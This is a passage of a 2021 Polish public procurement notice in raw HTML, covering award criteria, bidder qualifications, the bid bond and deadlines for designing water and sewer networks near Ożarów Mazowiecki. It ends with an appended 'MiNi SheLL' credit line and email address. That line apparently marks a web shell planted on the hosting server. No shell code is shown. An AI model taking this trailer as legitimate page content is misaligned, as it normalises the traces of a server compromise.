realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1 Przedmiot zamówienia obejmuje wykonanie koncepcji, a następnie dokumentacji technicznej (<br/>opracowanie projektów budowlano-wykonawczych) wraz z uzyskaniem prawomocnych<br/>pozwoleń dla elementów zamówienia dla których w/w decyzje są wymagane przepisami prawa<br/>w celu budowy :<br/>Cz. D – sieci wodociągowej w miejscowości Mory<br/>( ul. Poznańska wraz z przejściem pod DK 92 do istniejącej sieci wodociągowej wzdłuż ul.Poznańskiej na terenie Gminy Ożarów Mazowiecki)<br/>Szacowana długość sieci wodociągowej ok. 200,0 mb (bez przyłączy) wraz z kompletem uzgodnień. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 10000 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7<br/>ustawy Pzp,<br/>tzn. polegających na powtórzeniu podobnych usług, stanowiących niniejsze zamówienie podstawowe<br/>- Wartość usług, o których mowa powyżej może wynieść maksymalnie do 50 % wartości<br/>zamówienia podstawowego<br/>- Warunki na jakich zostaną udzielone powyższe usługi – będą zgodne z przedmiotem zamówienia<br/>podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona oceny kryterium ceny z dokładnością do dwóch<br/>miejsc po przecinku zgodnie z zasadami matematycznymi, w kryterium doświadczenie osób<br/>wyznaczonych do realizacji zamówienia przyznane zostaną punkty całkowite (0,20,40).<br/>2.Zamawiający wybierze ofertę najkorzystniejszą na część D spośród nie odrzuconych ofert na<br/>podstawie kryterium ceny i doświadczenia osób wyznaczonych do realizacji zamówienia.<br/>3. Za najkorzystniejszą zostanie uznana oferta na część D z największą ilością punktów, stanowiących<br/>sumę punktów przyznanych w każdym kryterium z uwzględnieniem wagi procentowej danego<br/>kryterium.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1 O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki, o których mowa<br/>w art. 112 ust.2 ustawy, którzy:<br/>a) nie podlegają wykluczeniu ( na podstawie zapisów w pkt. 21 niniejszej SWZ, dotyczących<br/>podstaw wykluczenia )<br/>b) spełniają następujące warunki udziału w postępowaniu w zakresie:<br/>1) zdolności do występowania w obrocie gospodarczym,<br/>(Zamawiający nie precyzuje tego warunku);<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów<br/>(Zamawiający nie precyzuje tego warunku);<br/>3) sytuacji ekonomicznej lub finansowej<br/>( dotyczy cz. A, B, C i/lub D zamówienia ):<br/>Zamawiający wymaga - aby Wykonawca wykazał, że posiada środki finansowe lub zdolność<br/>kredytową<br/>- w kwocie minimum 5.000,00 zł<br/>4) zdolności technicznej lub zawodowej<br/>( dotyczy cz. A, B, C i/lub D zamówienia ):<br/>Zamawiający wymaga aby Wykonawca:<br/>a. wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje - w okresie<br/>ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie - minimum 3<br/>zamówienia, polegające na opracowaniu dokumentacji projektowo-kosztorysowej dotyczącej<br/>budowy/rozbudowy/przebudowy sieci kanalizacji sanitarnej lub wodociągowej o długości<br/>minimum 1500,0m, na które Wykonawca w imieniu inwestora pozyskał ostateczną decyzję o<br/>pozwoleniu na budowę.<br/>( dotyczy cz. A, B, C i/lub D zamówienia ):<br/>b. skierował do realizacji zamówienia publicznego osoby:<br/>- min. 1 (koordynator projektu) posiadający uprawnienia do projektowania w specjalności<br/>instalacyjnej w zakresie sieci i instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,<br/>wodociągowych i kanalizacyjnych bez ograniczeń<br/>Wymagane jest: doświadczenie – min. 5 lat stażu zawodowego po uzyskaniu uprawnień do<br/>projektowania w/w branży, wymaganych przepisami ustawy Prawo budowlane,<br/>- min. 1 projektant posiadający uprawnienia do projektowania w specjalności instalacyjnej w<br/>zakresie sieci i instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i<br/>kanalizacyjnych bez ograniczeń<br/>Wymagane jest: doświadczenie – min. 5 lat stażu zawodowego po uzyskaniu uprawnień do<br/>projektowania w/w branży, wymaganych przepisami ustawy Prawo budowlane<br/>Dla osób odpowiedzialnych za realizację zamówienia Zamawiający dopuszcza ważneuprawnienia do projektowania, odpowiadające wymienionym wyżej uprawnieniom, które zostały<br/>wydane na podstawie wcześniej obowiązujących przepisów.<br/>Samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy Prawo<br/>budowlane, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe<br/>zostały uznane na zasadach określonych w przepisach odrębnych tj. m.in. w ustawie o<br/>zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii<br/>Europejskiej z dnia 22 grudnia 2015 r. (t.j. Dz.U.2020.220) oraz w rozumieniu art. 20 a ust. 1<br/>ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów<br/>budownictwa (t.j. Dz.U.2019.1117). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) odpis lub informacja z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzona nie wcześniej niż<br/>3 miesiące przed jej złożeniem jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji*Jeżeli<br/>Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast<br/>dokumentów, o których mowa powyżej, składa dokument lub dokumenty wystawione w kraju, w którym<br/>ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: nie otwarto jego likwidacji, nie<br/>ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami,<br/>jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji<br/>wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury Jeżeli<br/>wk<br/>raju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o<br/>których mowa powyżej, zastępuje się je odpowiednio w całości lub w części dokumentem<br/>zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych<br/>do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą,<br/>lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o<br/>oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem,<br/>organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce<br/>zamieszkania wykonawcy. Zastępczy dokument, o którym mowa powyżej, powinien być wystawiony nie<br/>wcześniej niż 3 miesiące przed jego złożeniem. Wykonawcy mający siedzibę lub miejsce zamieszkania<br/>poza terytorium Rzeczypospolitej Polskiej, składają wymagane przez Zamawiającego dokumenty<br/>zgodnie z rozporządzeniem Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy (Dz. U. 2020.2415)b) oświadczenie wykonawcy, w zakresie art. 108 ust. 1<br/>pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia<br/>16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym<br/>wykonawcą, który złożył odrębną ofertę/ofertę częściową albo oświadczenie o przynależności do tej<br/>samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie<br/>oferty/oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy<br/>kapitałowej c) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym<br/>mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych<br/>przez zamawiającego w pkt 22 SWZ, o którym mowa w § 2 ust. 1 pkt 7 oraz § 3 rozporządzenia<br/>Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków<br/>dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od<br/>wykonawcy (Dz. U. 2020.2415)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">* (przy składaniu oferty na część A, B, C i/lub D):<br/>a) wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie potwierdzający wykonanie minimum 3 zamówienia, polegające na opracowaniu dokumentacji projektowo-kosztorysowej dotyczącej budowy/rozbudowy/przebudowy sieci kanalizacji sanitarnej lub wodociągowej o długości minimum 1500,0m na które Wykonawca w imieniu inwestora pozyskał ostateczną decyzję o pozwoleniu na budowę, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających czy usługi zostały wykonane lub są wykonywane należycie.<br/>Dowodami w przypadku zamówień na usługi są:<br/>– referencje,<br/>– inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów to oświadczenie Wykonawcy, Uwaga! W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>* (przy składaniu oferty na część A, B, C i/lub D):<br/>b) wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami:<br/>- min. 1 (koordynator projektu) posiadający uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci i instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń<br/>Wymagane jest: doświadczenie – min. 5 lat stażu zawodowego po uzyskaniu uprawnień do projektowania w/w branży, wymaganych przepisami ustawy Prawo budowlane,<br/>- min. 1 projektant posiadający uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci i instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez<br/>ograniczeń<br/>Wymagane jest: doświadczenie – min. 5 lat stażu zawodowego po uzyskaniu uprawnień do projektowania w/w branży, wymaganych przepisami ustawy Prawo budowlane<br/>* (przy składaniu oferty na część A, B, C i/lub D):<br/>c) informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w kwocie min. 5.000,00 zł<br/>wystawionej nie wcześniej niż 3 miesiące przed jej złożeniem,<br/>* W przypadku, gdy Wykonawca powołuje się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 112 ust. 2 pkt 3 ustawy Pzp, na zasoby innych podmiotów należy złożyć informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzającą<br/>wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu w kwocie min. 5.000,00 zł, wystawioną nie wcześniej niż 3 miesiące przed jej złożeniem Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego powyższych dokumentów, o których mowa powyżej w pkt 12.7 lit. d) SWZ, wykonawca składa inne dokumenty, które w wystarczający sposób potwierdzają spełnianie opisanego przez zamawiającego<br/>warunku udziału w postępowaniu, dotyczącego sytuacji ekonomicznej lub finansowej.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> a) *Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego<br/>do złożenia oferty musi być złożone w oryginale w takiej samej formie jak składana oferta (tj. w<br/>formie elektronicznej lub w postaci elektronicznej, opatrzonej podpisem kwalifikowanym,<br/>podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii<br/>(skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego<br/>poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego1991 r. – prawo<br/>o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem<br/>elektronicznym bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w<br/>formie pisemnej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona<br/>przez upełnomocnionego. (*jeżeli dotyczy )<br/>Dokument ten będzie załącznikiem Nr 2 do oferty.<br/>b) Dowód wpłacenia wadium:<br/>(na część A – 900,00 zł, na część B – 700,00 zł,<br/>na część C – 1.000,00 zł, na część D – 100,00 zł)<br/>* (przy składaniu oferty łącznie na cz. A/B/C i/lub D ) powyższe kwoty sumują się.<br/>Wadium może być wnoszone wg wyboru Wykonawcy w jednej lub kilku formach zgodnie z art.<br/>97 ust. 7 pkt 1-4 ustawy Pzp.<br/>W przypadku wnoszenia wadium w innej formie niż pieniężna dowód wpłacenia wadium należy<br/>złożyć w oryginale w postaci elektronicznej.<br/>Dokument ten będzie załącznikiem Nr 3 do oferty.<br/>c) *Zobowiązanie podmiotów, na których zdolnościach technicznych, zawodowych, sytuacji<br/>finansowej lub<br/>ekonomicznej polega Wykonawca do oddania mu do dyspozycji niezbędnych zasobów na<br/>potrzeby realizacji<br/>zamówienia podpisane: kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym podmiotu udostępniającego zasoby. ( *jeżeli dotyczy )<br/>Dokument ten będzie załącznikiem Nr 4 do oferty.<br/>d) *Oświadczenie, z którego wynika które usługi wykonają poszczególni Wykonawcy składający<br/>ofertę wspólnie, podpisane kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym ( *jeżeli dotyczy )<br/>Dokument ten będzie załącznikiem Nr 5 do oferty. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.Zamawiający ustala wadium w wysokości:<br/>część A – 900,00 zł (słownie: dziewięćset złotych )<br/>część B – 700,00 zł (słownie: siedemset złotych )<br/>część C – 1.000,00 zł (słownie: tysiąc złotych )<br/>część D – 100,00 zł (słownie: sto złotych )<br/>* (przy składaniu oferty łącznie na cz. A/B/C i/lub D ) powyższe kwoty sumują się.<br/>2. Wadium należy wnieść w jednej z form podanych w art. 97 ust. 7 ustawy Pzp.<br/>Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia<br/>upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2<br/>i 3 oraz ust. 2 ustawy Pzp.<br/>3.1 Wadium wnoszone w pieniądzu Wykonawca wpłaca na rachunek Zamawiającego w banku:<br/>PKO BP S.A. XVIII O/Warszawa; Nr konta: 15 1020 1185 0000 4602 0019 2351<br/>z adnotacją: ”Wadium RZP.271.30.2021, na część …… * ” (należy przypisać właściwą<br/>część/części)<br/>3.2 Za termin wniesienia wadium w formie pieniężnej ( przelewem ) zostanie przyjęty terminuznania rachunku Zamawiającego.<br/>4 Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa a art. 97 ust<br/>1 pkt 2 – 4 ustawy Pzp Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub<br/>poręczenia w postaci elektronicznej.<br/>5 Postanowienia pkt 11 SWZ odnośnie wadium są dla Wykonawców wiążące.<br/>6 Zwrotu wpłaconego wadium wykonawcom Zamawiający dokona w trybie art. 98 ust.1 i 2<br/>ustawy Pzp.<br/>7 Oferta wykonawcy, który nie wniesie lub wniesie wadium w sposób nieprawidłowy lub nie<br/>utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o<br/>zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zostanie<br/>odrzucona na podstawie art. 226 ust.1 pkt 14 ustawy Pzp.<br/>8 Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w<br/>formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2–4, występuje<br/>odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, jeżeli wykonawca w<br/>odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1, z przyczyn<br/>leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub przedmiotowych<br/>środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 lub art. 106 ust.<br/>1, oświadczenia, o którym mowa w art. 125 ust. 1, innych dokumentów lub oświadczeń lub nie<br/>wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3, co spowodowało<br/>brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej ( art. 98 ust.<br/>6 pkt 1 ustawy Pzp)<br/>Zamawiający zatrzymuje również wadium wraz z odsetkami na podstawie art. 98 ust. 6 pkt 2 i 3<br/>ustawy Pzp; tj. jeżeli wykonawca, którego oferta została wybrana:<br/>1. odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w<br/>ofercie;<br/>2. nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;<br/>3. zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn<br/>leżących po stronie wykonawcy.<br/>19 Jeżeli wadium jest wniesione w jednej z form określonych w art. 97 ust. 7 ustawy Pzp, oprócz<br/>pieniężnej to wykonawca winien uwzględnić w nim wszystkie zapisy z ustawy Pzp dotyczące<br/>zatrzymania wadium. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia w rozumieniu art. 58 ust. 1 ustawy Pzp.<br/>Wykonawcy występujący wspólnie zobowiązani są dołączyć do oferty dokument (pismo, oświadczenie) wskazujący ustanowionego pełnomocnika do reprezentowania Wykonawcy w postępowaniu o udzielenie<br/>zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Dokument ten musi być wystawiony zgodnie z wymogami ustawowymi, podpisany przez prawnie<br/>upoważnionych przedstawicieli wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2. Zgodnie z art. 445 ust.1 ustawy Pzp Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.<br/>3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu z powodu niespełniania warunków, o których mowa w pkt. 10.1a SWZ.<br/>4. Jeśli wykonawcy wspólnie ubiegają się o udzielenie niniejszego zamówienia to:<br/>a) warunek określony w pkt 10.1.4) lit. a. musi spełniać przynajmniej jeden z Wykonawców (Partnerów) składających ofertę wspólną na cz. A, B, C i/lub D<br/>b) pozostałe warunki określone powyżej musi spełniać co najmniej jeden z Partnerów składających ofertę<br/>wspólną lub Partnerzy składający ofertę wspólną na cz. A, B, C i/lub D spełniają łącznie.<br/>5. W wypadku wspólnego ubiegania się o udzielenie zamówienia Wykonawcy mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do których realizacji te zdolności są wymagane. W takim wypadku należy złożyć Zamawiającemu oświadczenie do oferty, z którego wynika które roboty budowlane lub usługi wykonają poszczególni Wykonawcy składający ofertę wspólnie.<br/>6. W przypadku wykonawców wspólnie realizujących zamówienie (w tym konsorcjum) Zamawiający dokonywać będzie bezpośrednich rozliczeń tylko z liderem konsorcjum. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> a) Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian zawartej umowy odnośnie wydłużenia terminu realizacji z pkt. 5.1 SWZ:<br/>1. Z przyczyn zależnych i niezależnych od Zamawiającego, których nie mógł przewidzieć w chwili zawarcia umowy.<br/>2. Z uwagi na masowe występowanie choroby zakaźnej ludzi (w szczególności<br/>koronawirus/COVID-19, etc.) mające bezpośredni lub pośredni wpływ na terminową realizację niniejszego zadania.<br/>3. Z powodu działania siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach.<br/>4. W przypadku przedłużającej się procedury administracyjnej uzyskania pozwolenia na budowę (okres powyżej 65 dni ustawowych od dnia złożenia wniosku przez Wykonawcę). Termin wykonania przedmiotu zamówienia ulegnie wtedy przedłużeniu max. o okres przekraczający ustawowy termin wydania pozwolenia na budowę. Zmiana terminu realizacji zamówienia wynikająca z ewentualnych powyższych przesłanek <br/>zostanie wprowadzona w formie aneksu do umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-12 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-12 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-10</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> A) Cena - 60%<br/>B) Doświadczenie osób wyznaczonych do realizacji zamówienia – waga kryterium - 40 % <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> WYKONANIE KONCEPCJI ORAZ DOKUMENTACJI TECHNICZNYCH<br/>- OPRACOWANIE PROJEKTÓW BUDOWLANO-WYKONAWCZYCH:<br/>CZ. A – SIECI KANALIZACJI SANITARNEJ W MIEJSCOWOŚCI WOLSKIE<br/>CZ. B – SIECI KANALIZACJI SANITARNEJ W MIEJSCOWOŚCI MORY ETAP I<br/>CZ. C – SIECI KANALIZACJI SANITARNEJ W MIEJSCOWOŚCI JAWCZYCE – ETAP I<br/>CZ. D – SIECI WODOCIĄGOWEJ W MIEJSCOWOŚCI MORY</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-28 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com